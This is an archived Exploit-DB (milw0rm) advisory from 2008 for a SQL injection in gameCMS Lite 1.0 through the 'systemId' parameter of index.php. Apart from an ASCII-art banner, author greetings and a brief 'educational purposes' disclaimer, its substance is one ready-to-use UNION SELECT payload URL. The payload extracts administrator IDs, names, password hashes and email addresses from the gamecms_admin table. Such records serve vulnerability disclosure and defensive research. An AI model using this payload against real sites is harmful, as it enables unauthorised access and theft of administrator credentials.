GameCMS Lite 1.0 - 'systemId' SQL Injection

EDB-ID:

5555


Platform:

PHP

Published:

2008-05-07

                                                       w           w     w 
                                                        ||          ||   | ||        
                                                 o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                                                ( :   /    (_)    /           (   .  
                              |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
                              |     _                   __           __       __          ______     |
                              |   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
                              |  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
                              |  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
                              |     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
                              |      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
                              |       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
                              |                  \ \____/ >> Kings of injection                      |
                              |                   \/___/                                             |
                              |                                                                      |
                              |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

-Title :: gameCMS Lite Remote SQL Injection Vulnerability
-Author :: InjEctOr5
-discouvred by :: total - djekmani
-HoMe :: www.sb0x.com/forums

-Application :: gameCMS Lite 1.0
-Download :: http://rapidshare.com/files/27043814/gameCMS.rar
-Dork  :: Clear your Mind

-Greets :: Allah - InjEctOr5 TeaM - stack terrorist - coNan - Mr_linker - my love - and all my friends

-Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.

--------------------------------------------[C o n t e x t]-----------------------------------------

-ExplO!t : http://target/index.php?systemId=5'+union+select+1,2,concat_ws(0x3a3a,adminId,name,password,email,groupId),4,5+from+gamecms_admin/*

-------------------------------------------[End of  context]----------------------------------------

# milw0rm.com [2008-05-07]